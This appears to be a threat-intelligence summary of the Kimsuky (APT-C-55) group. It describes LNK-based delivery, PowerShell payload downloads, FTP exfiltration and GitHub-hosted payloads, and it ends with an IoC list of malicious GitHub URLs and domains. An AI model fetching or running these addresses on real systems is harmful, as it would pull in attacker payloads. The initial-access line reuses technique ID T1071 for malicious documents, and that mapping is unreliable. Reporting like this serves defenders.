Summary:
APT-C-55, also known as Kimsuky, is a cyber threat group that has evolved its tactics to target various countries, including South Korea, the US, Russia, and Europe, primarily for intelligence theft. Recent findings reveal their use of GitHub as a platform for distributing malicious payloads, highlighting their advanced techniques and persistent threat landscape.
Keypoints:
Kimsuky has been active since 2013, targeting think tanks, government agencies, media, and academic institutions.
The group has expanded its attack scope to include countries beyond South Korea.
Recent attacks utilize LNK files to deliver malicious payloads.
Analysis revealed a malicious address hosted on GitHub, indicating a new strategy for payload distribution.
Malicious scripts were found to collect sensitive information and upload it to remote servers.
Attacks involve sophisticated obfuscation techniques to evade detection.
Recommendations include network monitoring, process auditing, and employee training on phishing awareness.
MITRE Techniques
Initial Access (T1071): Utilizes malicious documents as the initial attack vector.
Command and Control (T1071): Uses GitHub for command and control communications and payload distribution.
Data Collection (T1056): Collects sensitive information such as file lists and network configurations.
Data Exfiltration (T1041): Uploads collected data to remote FTP servers.
Execution (T1059): Executes PowerShell commands to download and run additional malicious payloads.
IoC:
[url] https://raw.githubusercontent.com/vertigose/risker/main/db.txt
[url] https://raw.githubusercontent.com/vertigose/risker/main/info1.txt
[url] https://raw.githubusercontent.com/vertigose/risker/main/down1.txt
[url] https://raw.githubusercontent.com/vertigose/risker/main/up1.txt
[domain] strongsi.sportsontheweb.net
[domain] sussthanks.sportsontheweb.net
Full Research: https://mp.weixin.qq.com/s/GzMoR8jKjelzuj5BPhpJYA